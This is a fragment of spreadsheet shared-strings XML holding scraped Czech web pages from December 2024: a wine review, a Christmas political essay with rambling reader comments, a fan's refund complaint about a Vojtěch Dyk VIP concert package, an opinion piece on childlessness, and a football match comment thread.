Pojďme to vyzkoušet.</t>
  </si>
  <si>
    <t>20241201_84_3477365656_e76883d620e7e3405bb8.html</t>
  </si>
  <si>
    <t>e76883d620e7e3405bb8</t>
  </si>
  <si>
    <t>Víno Ryzlink rýnský 2023, moravské zemské víno, Rodinné vinařství Ilčíkovi</t>
  </si>
  <si>
    <t>Víno Ryzlink rýnský 2023, moravské zemské víno , Rodinné vinařství Ilčíkovi /100 1. 12. 2024 „Transparentní zlatožlutá barva se zářivě žlutými odlesky a výraznou viskozitou. Čistá, jemná, středně intenzivní, minerálně zemitá vůně, pojí aroma lipového květu a medu, s tóny marmelád z letního ovoce, s lehkým dotykem koření, v pozadí i s limetkou. Výraznější a plnější, bohatá, čistá, svěží, lehce nasládlá chuť dokonale harmonizuje s vůní, vytváří nádhernou kompozici sladkých tónů ovocných marmelád z buketu, živé kyselinky a pevné minerální struktury, obohacené o jemnou kořenitost. Velmi dlouhý, šťavnatý závěr.“ (0) /100 25. 7. 2024 Velmi dobré víno : K dokonalosti ještě něco chybí, ale je to dobře udělané víno , které můžete popíjet i častěji. (0) Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241201_85_3477332650_7e02d750774290a69ed5.html</t>
  </si>
  <si>
    <t>7e02d750774290a69ed5</t>
  </si>
  <si>
    <t>Poselstvím blížících se Svátků je především NADĚJE</t>
  </si>
  <si>
    <t>Poselstvím blížících se Svátků je především NADĚJE Podrobnosti 1521 x V těchto dnech se na náměstích rozsvěcují vánoční stromky, ze stánků začínají vonět svařáky, trdelníky či další lahodné dobrůtky, a lidé už myslí na letošní vánoční cukroví. Patří to k době, která je po většinu dne zahalena do tmy a šedi, že rozsvěcujeme svíčky a těšíme se na vytoužený klid, pohodu, blízkost; na potkávání se s lidmi, které máme rádi. Právě ona jakási magická "rozsvícenost" - nejen kolem, ale i zvláště v nás samotných - nás vybízí k určitému "restartu věcí i našich životů". Lidé by neměli šidit přicházející Vánoce, protože tyto svátky (ať už si je spojujeme s pohanským Slunovratem, s křesťanským i tradičně českým Ježíškem či s mezilidskou solidaritou a blízkostí v tom nejobecnějším slova smyslu), tvoří jakýsi odrazový můstek do časů budoucích. Stejně tak, jako bychom neměli slevovat z vánočních nadějí a radostí, neměli bychom nikdy rezignovat ani na právo žít plnohodnotný, spravedlivý a důstojný život. Pro mnohé lidi v současném socioekonomickém systému jako by Vánoce už nebyly garantovanou samozřejmostí. Teplo domova, jistota důstojného zaměstnání, jistota stabilního rodinného rozpočtu, perspektiva světlé budoucnosti a bezpečí, život v míru... Někdo by sice mohl namítnout, že ve světě neexistují žádné mravní zásady, žádné meze,... Že jsme asi jedni z posledních svého druhu, protože stavíme naši zem a lidi jako takové nad zisk. Že jsme naivní a utopičtí... V tom se však nesmírně mýlí, neboť jedině skutečné mravní zásad y tu po nás zůstanou jako trvalé a nepomíjivé - tradice, láska člověka k člověku, rodina. Pokud i na ně rezignujeme, ztratíme svou vlastní integritu a identitu. Kapitalismus přinesl lidem westernizaci hodnot a novou modlu - náhražkový fetiš v podobě nákupního vozíku. Bez sociálních práv, jež ale kapitalismus drtivé většině lidí krutě sebral a jež jim bude ubírat i nadále, se tento košík bude postupně stávat materiálně víc a víc prázdnějším. O duchovním strádání společnosti ani nemluvě. Konzumní "jho kapitalismu" však přejde v moderní formu otroctví pouze tehd y, pokud my sami to dovolíme... Poselstvím blížících se Svátků a právě nastupujícího adventního času tak zůstává jako hodnota neměnná nová NADĚJE. Naděje, že svět a lidé jsou schopni se vyvíjet a že věci veřejné lze měnit k lepšímu. První krok - či obrazně řečeno - první svíci světla - však musíme rozsvítit my - každý jeden z nás - sami v sobě - ve svém nitru. Žít sám se sebou v míru je totiž nezbytným předpokladem pro lásku k druhým lidem. Víra, že druhý pokus o demokratický socialismus už lidé v sobě zvládnou... Pokoj všem lidem dobré vůle! #2 Picture 2024-12-02 11:00 Par-teč-ka Jirkov cz usa smí-chov: A tahle partička mě obviňuje ze všech možných špatností... Tohle si přepsali, ještě než sem vlezli... Ale nevím co vše viděli dopředu, protože i když mají smlouvu..jejich životy né vždy byly hezké. Spousta lidí měla veliké úrazi, zvláštní načasování, různé nehody a smrti v rodině, mrtvé děti nebo sourozenci, někdy umřeli i celé rodiny, tolik úrazu hlavy a nohou, různé amputace nebo strávili zbytečně spousty let ve vězení...v blázincích.. Někteří byly v tv kvůli různým zlym věcem, spousta lidí žilo na ulici nebo pořád u různých lidí co je různé využívali... Po životě půjdou k soudu, vysvětlit zlé skutky, anti-kristování (kvuli tomu měli kletby a neštěstí v životě) zaplatit za to co měli navíc (finance (většinou získané kriminalitou) a dotovaná psychika na alkohol a drogy, a hlavně pak půjdou zaplatit satanovi za výhody, co v životě měli (nikdo neví, co vlastně démon bude chtít ) .. Nebo možná po životě se nic nevysvětluje, a jenom se nám ukážou statistiky a dluh popřípadně co jsme získali za poklady nebo kletby, a jde se dál. #1 Picture 2024-12-02 07:40 Cézet Ušák Ú-štěk smí-chov, dodatek: Ota / Tomek / Komet / koment / tar / rat / Tatar / turek / Chazar / Chaz / kár / ran / zach-raň / auto / Daniel / Božkov / bóža / Tůma / tou-r-mat / auto-mat / mat-ou-t / Tomato / rajče / če-er-ráj / Jára / hrá-če-k / Michal / dvou-řádek / dvořá-ček / hrášek / pole / polep / pořá-dek / poraď / Turnaj / tu / tour / náj / amen / tournament / Do-laďo-vat / vata / vada / tav / cit / kva-sit / qas-nov / Snowden / den-is-a / jeden / Sám-er / is-s-a / masér / krysa / kos-tas / koště / koš / štěk / zerdaloglu / Zed-na / Zdena / henk-ovec / henk Moody / jackpot / Šárka / kráska / vaň-kov / vokna / no / vínka / Taft / fat / fet / aft / after / po-tom-ek / potok / mek / Tomek / Student / ská-j / Sky / yks / X / stud / end / rajčan / mr-ňák / nějak / káňe / Ken / can / jes-třáb / hawk / Bárt / McCan / Volá / love / Penny / mark-ket / matka / mad-kat / pence / pen-cák / Penk / Lišková / žilka / Veronika / Mít-tel-bauch / Cáb-k-očká / Domína / matěj / jan-dák / bota / Melichar / Duš-an / mír / mejdlo / dus-it / zkusit / gram / brácha / rum / Odvárka / pramen / bremen / louka / tloukl / loket / Low-cat / vol / tak / olej / mlýn / m-lejn / Mejt / lejt / made-leine / Milk / ka-milka / klín / Goral / volá / love / nic / kola / škola / Klima / Indy / i-dny / báj / ječ / ječná / kar-ma / má-r-k / bar-ber / Prima / jarmark / Klik / Kill-k /kluk / Culkin / cool / kůl / Macaulay / Mek kauláj / káj-lová / Kevin / kluk Evin / denny kéj / kočka / lájoš / Kelevera / věru / řev / Agara / Algavre / Rapper / kid-nap-per / napni / pero / Sám doma / boh / a tý / máš / náš / Adam / Anna / děda / Strojetice / chata / Kadaň / Petr / rept / Gill / muk / mukl / a-lijóša / Oh lamour / ai / můra / Merlin / grem-lin / Silent / slint / Hill / kill / jill / Avith Ortega / Autor: Miroslav Suja, Marek Adam Autoři person Miroslav Suja person Marek Adam</t>
  </si>
  <si>
    <t>20241201_86_3477364941_ee98ea9bdd259e0c56a5.html</t>
  </si>
  <si>
    <t>ee98ea9bdd259e0c56a5</t>
  </si>
  <si>
    <t>Dyk v pantoflích a zvláštní afterparty: Fanynka žádá zpět 12 tisíc za VIP lístek 1. 12. 2024 10.8 Fanynka Vojty Dyka, která zaplatila téměř 12 tisíc korun za VIP lístek na koncert v O2 areně , kritizuje aroganci pořadatelů, zpěvákovu ležérnost a nevhodné prostředí afterparty. (Foto: Dagmar Světlovská) Níže přikládáme celé vyjádření fanynky: Zpěváka Vojtu Dyka jsem měla ráda jako talentovaného hudebníka, a protože mě celkem děsí velké davy lidí, koupila jsem si z těchto dvou důvodů vstupenku na koncert V. Dyka v O2 aréně 27.11.2024 v podobě VIP Experience za 12 000 Kč v naději na obvyklou VIP zónu (popisovali moji kamarádi, kteří byli v O2 aréně na jiných akcích), ve které nestojíte na chodbě, v průvanu a kolem proudícím davu fronty na limonádu, neotloukají vás lokty kolemjdoucí neurvalci a pod. Ne protože bych nevěděla, co s penězi, ale poprvé v životě jsem chtěla zažít slibovanou VIP péči. Jak otřesná byla (nejen) moje „VIP“ zkušenost, pochopíte z textu mého mailu pořadatelům, ve kterém žádám o vrácení peněz. Dobrý den, žádám okamžité vrácení peněz za vstupenku VIP Experience, protože nebylo splněno to, co jsem měla za tuto velice vysokou cenu dostat. 1) Setkání v 18 hodin se zúčastnil pouze Vojtěch Dyk , v teplákách, mikině a pantoflích. Nikdo z členů kapely se neobjevil, přestože mělo jít o setkání i se členy kapely Žádný welcome drink (ani obyčejná voda!), jak bývá zvykem, jen nabídka společné hromadné fotky (ve dvou skupinách) a pak po pár minutách unavených slov V. Dyka výkřik černovlasé dámy, která se ani nepředstavila: „Kdo je už vyfocený, ať jde dolů. Tam si můžete koupit merch.“ Jak brutální arogance pořadatele i interpreta! 2) To, co bylo prezentováno jako oficiální after party – za 9 500 Kč – bylo něco tak otřesného, že to nelze považovat za žádnou, ani tu nejmizernější, after party. Skutečná after party se odehrávala v uzavřeném soukromí o nějaké patro výše v tom samém hotelu. Tam jsme ale my, VIP Exsperience, neměli přístup. U vchodu do hotelu nebylo žádné označení, teprve, až jsme našli hostesku (zaměstnanec hotelu, který vůbec nic nevěděl), řekla nám, že si můžeme buď sednout do baru u recepce, kde si vše zaplatíme sami, nebo můžeme bar obejít a tam v prostoru, který připomínal černou, temnou noru, si dát občerstvení, které je v ceně after party. Toto občerstvení představovalo pár misek s olivami, pár misek s chipsy na dlouhém stolu u zdi a na malých stolcích uvnitř prostoru 1 mistička s arašídy a 1 sklenička s 3 kousky malých tyčinek. Nealkoholické nápoje jsme si museli otevřít sami, víno – cca 2 polévkové lžíce do velké sklenky – nalévali přítomní číšníci u stolku s alkoholickými nápoji 3) Nikdo z účinkujících se do 23.30 hodin nedostavil na tuto „oficiální“ after party v depresivním, temném a tak spoře osvětleném prostoru, že nebylo vidět do tváře ani lidem stojícím metr od vás. Hosteska nebyla schopná odpovědět, na četné dotazy, jestli někdo přijde apod. 4) Otřesná úroveň „čehosi“, co se rozhodně nedá nazvat párty, absolutně neodpovídá ceně 9 500 Kč, proto žádám o vrácení těchto peněz. Částku 9 500 Kč mi v rámci reklamace pošlete do týdne, tj. do 5.12.2024, zpět na můj bankovní účet č….. V opačném případě podám trestní oznámení na pořadatele za podvod. A také se o celou záležitost a tuto příšernou zkušenost podělím s tiskem. A vzhledem k tomu, že mi otřesný zážitek z „after party“ vzal i zbytky radosti z koncertu V.Dyka, ocenila bych, kdybyste mi vrátili celou částku, tj. 12000 Kč. Navíc – V. Dyk ve videích zvoucích na tento koncert opakovaně prezentoval konkurz na hosty jeho koncertu. Tím úmyslně vytvářel v lidech dojem, že na koncertě bude hodně hostů, ale nakonec se ukázalo, že šlo o fiktivní konkurz a na koncertě nikdo z hostů z videí nebude. To se dá s úspěchem považovat za klamavou reklamu, což je trestný čin. A fakt, že v závěru koncertu pozval V.Dyk na podium asi 30 osob, které hrály ve fiktivním konkurzu a napomáhaly tak klamavé reklamě, bylo nejen zavlečení dalších osob do protiprávního jednání, ale současně i velmi krutá arogance. Zpupně nám ukázal, s kým půjde slavit na after party, kterou jsme mu zaplatili my, které na ni nepustil. A nápad přizvat na podium do závěrečné „děkovačky“ i Jiřinu Bohdalovou , která jen kradla potlesk muzikantům (nevystupovala na koncertu, stejně jako ti ostatní z videí, co stáli vedle ní), byl vrcholem projevů arogantního pohrdání fanoušky, které předvedl V.Dyk a jeho organizační/produkční tým. Kroucení zadkem J. Bohdalové při děkovačce, kdy se držela za ruku V.Dyka, aby se vůbec udržela na nohách, bylo na pozvracení se. Koupila jsem si VIP vstupenku na koncert V. Dyka , ne na „taneční vystoupení“ 93 leté stařeny a defilé kamarádů V.Dyka, s kterými pak šel slavit – za moje peníze, respektive za peníze VŠECH, kteří si koupili VIP Experience. Ocením proto, když mi vrátíte celou částku, tj. 12 000 Kč, investovanou do koncertu V. Dyka . Koncertu, jehož program/obsah neodpovídal pozvánkám. ……… P.S. Včera jsem tuto stížnost napsala na facebookové profily V. Dyka a jeho kapely. Místo jakékoliv reakce smazali můj komentář a mě na fb zablokovali. Tím jen potvrdili, že VIP experience podvod byl předem naplánovaný a že lidmi, díky kterým mají příjmy takové, jaké mají, jen arogantně pohrdají. Autor: Redakce Rubrika transition_slide z domova</t>
  </si>
  <si>
    <t>32150</t>
  </si>
  <si>
    <t>38350</t>
  </si>
  <si>
    <t>20241201_87_3477324077_3ee753d165a6c1091c8e.html</t>
  </si>
  <si>
    <t>3ee753d165a6c1091c8e</t>
  </si>
  <si>
    <t>Bezdětnost je trnem v&amp;nbsp;oku nejen ruskému prezidentovi Vladimiru Putinovi</t>
  </si>
  <si>
    <t>Bezdětnost je trnem v&amp;nbsp;oku nejen ruskému prezidentovi Vladimiru Putinovi Bezdětnost je trnem v oku nejen ruskému prezidentovi Vladimiru Putinovi Ruský prezident Vladimir Putin se rozhodl zakázat jakoukoliv propagaci bezdětnosti. Poukazuje především na minulost, kdy ženy mívaly čtyři, pět, šest dětí. Mladé muže mu ale bere hlavně válka. Tímto nařízením zasáhne především do práv milionů mladých žen a dívek, kterým sebere svobodu rozhodnout se o svém dalším životě. Zda se věnovat roli maminky nebo budovat kariéru, studovat, cestovat. Pamatuji se na dobu před listopadem 1989, kdy na svobodnou a bezdětnou ženu po dvacátém roce života bylo pohlíženo skrz prsty. V pětadvaceti byla především na vesnici vnímána za podivínku a po třicítce nesla stigma staré panny. Zajímavé je, že na staré mládence se pohlíželo jako na muže v nejlepších letech, kteří mají na ženění času dost a určitě si někdy nějakou ženu, s níž založí rodinu, najdou. Žena to zkrátka neměla lehké v žádné době, bez ohledu na režim a vládnoucí garnituru. A pravděpodobně, tam kde vládne patriarchát, ani mít nebude. Žena vnímána pouze jako stroj na výrobu dětí Ruské nařízení o zákazu ideologie dobrovolné bezdětnosti, která je vnímaná jako zločin, budí značné rozpaky. Alexandr Něvzorov kritizuje navrhovaný zákon s tím, že by ženám mohlo hrozit vězení za „neplnění plánu potravy pro děla“. Putinův režim považuje lůna ruských žen za vybavení ruských továren ke tvoření nových mladých bojovníků. Ruští zákonodárci přišli s myšlenkou uvalit daň na bezdětné rodiny. Konec konců i v Československu v minulém století platili svobodní tzv. volskou daň. A i dnes mají bezdětní daně mnohem vyšší, a také cestování a ubytování se v jednolůžkovém pokoji je pro ně mnohem dražší. Platí daň z osamění. Ne každý člověk je bezdětný a osamělý dobrovolně. Muž má oproti ženě tu výhodu, že dítě může zplodit takřka v jakémkoliv věku. Příkladem může být zesnulý zpěvák Karel Gott a spousta dalších mužů, nejen ze světa celebrit. Na druhé straně, spousta takovýchto starších rodičů se nemusí dočkat ani maturity svých potomků, neprožijí s nimi větší část života. Dnes je naopak módou děti nemít a mnozí mladí, zajištění a slušně vydělávající lidé si do domku raději pořídí psa. Na rodičovství se buď necítí dostatečně zralí nebo se nechtějí dítěti obětovat a raději budují kariéru nebo cestují po světě. Jiní by zase rodinu rádi založili, ale nemají kde bydlet. Na hypotéku dostatečný příjem nemají a život v pronájmu je nejen nejistý, ale také drahý. Ve školkách není dostatečný počet volných míst, mnohde chybí zkrácené úvazky. Snad jediným plus je nejdelší mateřská v Evropě trvající čtyři roky. Rodina je základ státu Tento stát mladé rodiny příliš nepodporuje, tak jako tomu bylo v 70. letech, kdy se rodily silné populační ročníky tzv. Husákových dětí, díky silné prorodinné politice. Na druhé straně, spousta dětí se narodila během války, do nejistoty a bídy. A právě tyto děti, dnešní senioři, zplodily další generace a mnozí z nich mají velmi tuhý kořínek, kdy se dožívají více jak 80 let. A právě na jejich důchody dnes přispívají převážně jejich děti a vnuci. Bezdětných tolik nebývalo a ani ty díky silným populačním ročníkům nebylo a není těžké uživit. Brzy ale už tomu může být zcela jinak. Dneska už jsme někde úplně jinde. Populace rapidně stárne a dětí se rodí čím dál méně. Politici a ekonomové bijí na poplach, že v blízké budoucnosti na důchody buď vůbec nebude, nebo budou mnohem nižší, než jsou ty, jaké pobírají dnešní senioři. Tito senioři jsou také na dlouhou dobu těmi posledními, kteří odcházeli na zasloužený odpočinek poměrně brzy (ženy dle počtu dětí okolo 55 let) a v důchodu pobývají nejdéle. Za bezdětné radovánky v budoucnu zaplatí celá společnost. Mladí budou žít ve světě starců a daně společně s odvody budou pravděpodobně mnohem vyšší, než je tomu v současnosti, aby bylo důchody z čeho platit. A co víc, přibude osamělých starých lidí, o které se nebude mít kdo postarat. Už nyní mnohé padesátnice a starší především o Vánocích zabolí u srdce a hořce si popláčou do polštáře. Zůstaly samy. Nikdo je nenavštíví, každý je se svou rodinou, mnohé kolegyně a přítelkyně na ně najednou nemají čas. Vánoční stromeček buď raději ani nestrojí, anebo dárky pod něj kupují samy sobě. Mnohé raději odletí do exotických krajin, aby od toho veselí byly co nejdál. Mnohé takovéto ženy znám ve svém okolí a pohled na ně, kterak si popláčou u sklenky vína , je smutný. Jiné si to naopak užívají, záleží na povaze a tím, jak se s bezdětností ve starším věku dokáží vnitřně vyrovnat. Před sebou samými a ještě více osaměním ale neutečou. Každý rok navíc jim bude připomínat, jaké by to bylo trávit svátky s rodinou, vymýšlet a nakupovat dárky pro vnoučata. V mládí má člověk spoustu zájmů, přátel, rodiče, ke kterým se kdykoliv může přijít vyplakat na rameno. Prožívá své malé velké lásky. Tedy tam, kde rodina funguje tak, jak má, a lidé se mají skutečně rádi. Děti milují své rodiče a ti zase své děti. Léta se však překulí a najednou je tady stáří. Člověk zjišťuje neblahou skutečnost, že zůstal úplně sám. Nemilovaný a nevítaný. A aby toho na svých bedrech nenesl málo, mnohý politik přiloží polínko do ohně s tím, že na jeho důchod budou muset přispívat cizí děti. Protože on si své vlastní nepořídil. Společnost především na bezdětné seniory jednou může pohlížet skrz prsty. Budou chudší a stát více peněz. Třeba na různých dávkách, protože z jednoho a ještě nízkého důchodu nevyžijí. Nebude ani nikoho, kdo se o ně ve stáří postará. Již dnes jsou matky v důchodu odměňovány tzv. výchovným, kdy se jim dorovnává doba, v níž pečovaly o děti. Rusko a západ Obojí ideologii lze považovat za zvrácenost a odklon od skutečných hodnot. Zatímco Rusko proti ideologii dobrovolné bezdětnosti bojuje zákonem a značně omezuje práva žen svobodně se rozhodnout, zda založit rodinu či nikoliv, na západě je trend bezdětnosti na vzestupu. Západní civilizace dokonce uznává nespočet pohlaví. Na druhé straně politici, ekonomové a zaměstnavatelé roní krokodýlí slzy nad tím, že populace stárne, rodí se málo dětí, zatímco armáda seniorů se rok od roku zvětšuje. A s neustálým zvyšováním se odchodu do důchodu západní společnost nakonec spěje ke světu bez důchodců. Děti nebudou a důchodci také ne. Lidé budou pracovat takřka do smrti. Jedna maminka dokáže uživit pět dětí, ale pět dětí neuživí svou matku Lidé mají možnost se rozhodnout, zda mít děti či zůstat bezdětnými na základě svých hodnot, priorit a také životních zkušeností. Nemilované děti k založení rodiny tíhnout nemusí. A nikde není zaručeno, že dvě, tři děti se ve stáří o své rodiče postarají. Jak už praví staré pořekadlo: „Jedna maminka uživí pět dětí, ale pět dětí neuživí svou matku.“ Stačí se podívat na přeplněné domovy seniorů a naopak stále se snižující počet pečovatelek a zdravotních sestřiček v nich. Prostě nejsou a v budoucnosti se s rostoucím počtem starých lidí tento stav bude jen zhoršovat. Samy nejsilnější populační ročníky překročily nebo brzy překročí padesátku a jim začnou síly pozvolna ubývat. Další otázka se naskýtá, zda je nutné mít natolik přelidněnou planetu, že se lidstvo nakonec neuživí. Příroda také není bezednou studnicí surovin, které můžeme čerpat do nekonečna. Žijeme v nadbytku, nadspotřebě, zbytečně plýtváme především jídlem. Dříve si lidé dokázali spoustu věcí sami opravit, dnes si běžíme po pár měsících koupit nový výrobek. Planeta je zdevastovaná stejně tak, jako naše duše. Dožíváme se díky moderní medicíně stále vyššího věku, ale mnozí přežíváme v LDN v bolestech a osamění. Umíráme osamělí za nemocniční plentou namísto v kruhu svých nejbližších. Jak z toho ven? Dnes už asi nijak. Prospali jsme pětatřicet let jako v šípkovém království. Po listopadu 1989 děti ani rodina na prvním místě rozhodně nebyly. Mladí chtěli cestovat, studovat, vzdělávat se. Vychutnat a okusit to, o čem jejich rodiče za železnou oponou mohli jen snít. A politici jim k tomu dali nespočet příležitostí a zelenou. Důsledky nedomyslel nikdo. A kdo by se v čase mládí v rozkvětu, kdy je plný sil, energie, zdraví zabýval stářím a důchodem, který je tak moc dalekóóó. Ocitli jsme se ve zvláštní době, kdy nás dostihl nezvratný osud. Dnes je na trhu práce nejvíce lidí v produktivním věku z řad populačně silných ročníků ze 70. let. Nejvíce do státního rozpočtu přinášejí právě oni a také budou o mnoho let více pracovat než jejich rodiče a prarodiče. A kdyby padesátnice a starší ještě mohly rodit děti, nejeden politik by jim rozmnožení populace zadal do popisu práce. https://www.novinky.cz/clanek/zahranicni-evropa https://www.idnes.cz/zpravy/zahranicni/rusko-valka-demografie-krize-deti-bezdetnost-zeny-prava-zenska-potrat.A240708_180356_zahranicni_dtt</t>
  </si>
  <si>
    <t>20241201_88_3477332246_bd9e18c401ca5a267f20.html</t>
  </si>
  <si>
    <t>bd9e18c401ca5a267f20</t>
  </si>
  <si>
    <t>Poselstvím blížících se Svátků je především NADĚJE Podrobnosti 1481 x V těchto dnech se na náměstích rozsvěcují vánoční stromky, ze stánků začínají vonět svařáky, trdelníky či další lahodné dobrůtky, a lidé už myslí na letošní vánoční cukroví. Patří to k době, která je po většinu dne zahalena do tmy a šedi, že rozsvěcujeme svíčky a těšíme se na vytoužený klid, pohodu, blízkost; na potkávání se s lidmi, které máme rádi. Právě ona jakási magická "rozsvícenost" - nejen kolem, ale i zvláště v nás samotných - nás vybízí k určitému "restartu věcí i našich životů". Lidé by neměli šidit přicházející Vánoce, protože tyto svátky (ať už si je spojujeme s pohanským Slunovratem, s křesťanským i tradičně českým Ježíškem či s mezilidskou solidaritou a blízkostí v tom nejobecnějším slova smyslu), tvoří jakýsi odrazový můstek do časů budoucích. Stejně tak, jako bychom neměli slevovat z vánočních nadějí a radostí, neměli bychom nikdy rezignovat ani na právo žít plnohodnotný, spravedlivý a důstojný život. Pro mnohé lidi v současném socioekonomickém systému jako by Vánoce už nebyly garantovanou samozřejmostí. Teplo domova, jistota důstojného zaměstnání, jistota stabilního rodinného rozpočtu, perspektiva světlé budoucnosti a bezpečí, život v míru... Někdo by sice mohl namítnout, že ve světě neexistují žádné mravní zásady, žádné meze,... Že jsme asi jedni z posledních svého druhu, protože stavíme naši zem a lidi jako takové nad zisk. Že jsme naivní a utopičtí... V tom se však nesmírně mýlí, neboť jedině skutečné mravní zásad y tu po nás zůstanou jako trvalé a nepomíjivé - tradice, láska člověka k člověku, rodina. Pokud i na ně rezignujeme, ztratíme svou vlastní integritu a identitu. Kapitalismus přinesl lidem westernizaci hodnot a novou modlu - náhražkový fetiš v podobě nákupního vozíku. Bez sociálních práv, jež ale kapitalismus drtivé většině lidí krutě sebral a jež jim bude ubírat i nadále, se tento košík bude postupně stávat materiálně víc a víc prázdnějším. O duchovním strádání společnosti ani nemluvě. Konzumní "jho kapitalismu" však přejde v moderní formu otroctví pouze tehd y, pokud my sami to dovolíme... Poselstvím blížících se Svátků a právě nastupujícího adventního času tak zůstává jako hodnota neměnná nová NADĚJE. Naděje, že svět a lidé jsou schopni se vyvíjet a že věci veřejné lze měnit k lepšímu. První krok - či obrazně řečeno - první svíci světla - však musíme rozsvítit my - každý jeden z nás - sami v sobě - ve svém nitru. Žít sám se sebou v míru je totiž nezbytným předpokladem pro lásku k druhým lidem. Víra, že druhý pokus o demokratický socialismus už lidé v sobě zvládnou... Pokoj všem lidem dobré vůle! #2 Picture 2024-12-02 11:00 Par-teč-ka Jirkov cz usa smí-chov: A tahle partička mě obviňuje ze všech možných špatností... Tohle si přepsali, ještě než sem vlezli... Ale nevím co vše viděli dopředu, protože i když mají smlouvu..jejich životy né vždy byly hezké. Spousta lidí měla veliké úrazi, zvláštní načasování, různé nehody a smrti v rodině, mrtvé děti nebo sourozenci, někdy umřeli i celé rodiny, tolik úrazu hlavy a nohou, různé amputace nebo strávili zbytečně spousty let ve vězení...v blázincích.. Někteří byly v tv kvůli různým zlym věcem, spousta lidí žilo na ulici nebo pořád u různých lidí co je různé využívali... Po životě půjdou k soudu, vysvětlit zlé skutky, anti-kristování (kvuli tomu měli kletby a neštěstí v životě) zaplatit za to co měli navíc (finance (většinou získané kriminalitou) a dotovaná psychika na alkohol a drogy, a hlavně pak půjdou zaplatit satanovi za výhody, co v životě měli (nikdo neví, co vlastně démon bude chtít ) .. Nebo možná po životě se nic nevysvětluje, a jenom se nám ukážou statistiky a dluh popřípadně co jsme získali za poklady nebo kletby, a jde se dál. #1 Picture 2024-12-02 07:40 Cézet Ušák Ú-štěk smí-chov, dodatek: Ota / Tomek / Komet / koment / tar / rat / Tatar / turek / Chazar / Chaz / kár / ran / zach-raň / auto / Daniel / Božkov / bóža / Tůma / tou-r-mat / auto-mat / mat-ou-t / Tomato / rajče / če-er-ráj / Jára / hrá-če-k / Michal / dvou-řádek / dvořá-ček / hrášek / pole / polep / pořá-dek / poraď / Turnaj / tu / tour / náj / amen / tournament / Do-laďo-vat / vata / vada / tav / cit / kva-sit / qas-nov / Snowden / den-is-a / jeden / Sám-er / is-s-a / masér / krysa / kos-tas / koště / koš / štěk / zerdaloglu / Zed-na / Zdena / henk-ovec / henk Moody / jackpot / Šárka / kráska / vaň-kov / vokna / no / vínka / Taft / fat / fet / aft / after / po-tom-ek / potok / mek / Tomek / Student / ská-j / Sky / yks / X / stud / end / rajčan / mr-ňák / nějak / káňe / Ken / can / jes-třáb / hawk / Bárt / McCan / Volá / love / Penny / mark-ket / matka / mad-kat / pence / pen-cák / Penk / Lišková / žilka / Veronika / Mít-tel-bauch / Cáb-k-očká / Domína / matěj / jan-dák / bota / Melichar / Duš-an / mír / mejdlo / dus-it / zkusit / gram / brácha / rum / Odvárka / pramen / bremen / louka / tloukl / loket / Low-cat / vol / tak / olej / mlýn / m-lejn / Mejt / lejt / made-leine / Milk / ka-milka / klín / Goral / volá / love / nic / kola / škola / Klima / Indy / i-dny / báj / ječ / ječná / kar-ma / má-r-k / bar-ber / Prima / jarmark / Klik / Kill-k /kluk / Culkin / cool / kůl / Macaulay / Mek kauláj / káj-lová / Kevin / kluk Evin / denny kéj / kočka / lájoš / Kelevera / věru / řev / Agara / Algavre / Rapper / kid-nap-per / napni / pero / Sám doma / boh / a tý / máš / náš / Adam / Anna / děda / Strojetice / chata / Kadaň / Petr / rept / Gill / muk / mukl / a-lijóša / Oh lamour / ai / můra / Merlin / grem-lin / Silent / slint / Hill / kill / jill / Avith Ortega / Autor: Marek Adam Autor person Marek Adam Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>20241201_89_3477268122_ac0c3f418187f9efb9ec.html</t>
  </si>
  <si>
    <t>ac0c3f418187f9efb9ec</t>
  </si>
  <si>
    <t>Slavia - Liberec 1:0</t>
  </si>
  <si>
    <t xml:space="preserve">Slavia - Liberec 1:0 hajnej před 8 dny 01.12.2024 12:06 | 6 1 Miklos před 8 dny 01.12.2024 12:13 | 1 2 Řezat je, řezat je, řezat je.. Re: Slavia - Liberec Myšák před 8 dny 01.12.2024 12:13 | 1 2 Ať se práší za kočárem!!! Re: Slavia - Liberec p!erreCORE před 8 dny 01.12.2024 12:28 | 2 0 Pokud je připraven, měl hrát podle mně Chaloupek. Sestava zajímavá, čekal jsem i Li gra. Ivan gól. Komentář byl uživatelem upraven (01.12.2024 12:29) . Zobrazit původní komentář Pokud je připraven, měl hrát podle mně Chaloupek. Sestava zajímavá. Ivan gól.. p!erreCORE před 8 dny 01.12.2024 12:29 | 2 0 1zippo1 před 8 dny 01.12.2024 12:29 | 2 2 mig52 před 8 dny 01.12.2024 12:33 | 1 1 :-))). Jsi bourák! Budiž nám dopřáno. Budu nervózní jako prvorodička. Rodinný běh událostí tomu chce, že zápas neuvidím ani na streamu či telce. Snad mne livesport odmění. Re: Slavia - Liberec carevitchando před 8 dny 01.12.2024 12:53 | 1 0 Před třemi výjezdy je potřeba doma nezaváhat. Re: Slavia - Liberec George (přítel SN) před 8 dny 01.12.2024 12:58 | 1 0 Domino přeju ti gól...do nich, doufám, že jim ten jejich plán (jak řekl ten Kováč) rozsekáme po prvním poločase, respektive po pár minutách.... Re: Slavia - Liberec urs (přítel SN) před 8 dny 01.12.2024 12:59 | 1 0 p!erreCORE před 8 dny 01.12.2024 13:04 | 2 0 1. varování a první dobrý zakrok. Naštěstí. Komentář byl uživatelem upraven (01.12.2024 13:05) . Zobrazit původní komentář 1. varování. p!erreCORE před 8 dny 01.12.2024 13:08 | 2 0 Sherudan před 8 dny 01.12.2024 13:05 | 1 0 má někdo stream, prosím? Joker dnes nefunguje. Re: Slavia - Liberec Wulfstan (přítel SN) před 8 dny 01.12.2024 13:11 | 2 0 Nightwing před 8 dny 01.12.2024 13:13 | 2 0 slavista23 před 8 dny 01.12.2024 13:13 | 2 0 George (přítel SN) před 8 dny 01.12.2024 13:13 | 2 0 Dneska to nebude lehké, musíme dát gól, pak už to půjde.. Re: Slavia - Liberec slavista23 před 8 dny 01.12.2024 13:21 | 3 1 Ten komentátor na o2 je pěkné prase. Raději jsem dal origo zvuk. Re: Slavia - Liberec zeleznik2 před 8 dny 01.12.2024 13:28 | 4 1 slavista23 před 8 dny 01.12.2024 13:39 | 1 1 Že si nedají pokoj. Před tím byl vždy neutrální a člověk se dozvěděl i nějaké info. Dnes?? Jen to že tam sedí magor. Re: Slavia - Liberec Pedro50 před 8 dny 01.12.2024 13:21 | 2 4 Miklos před 8 dny 01.12.2024 13:24 | 6 0 Ti hráči Liberce padaj ve vápně jak kuželky.. Re: Slavia - Liberec zeleznik2 před 8 dny 01.12.2024 13:28 | 3 0 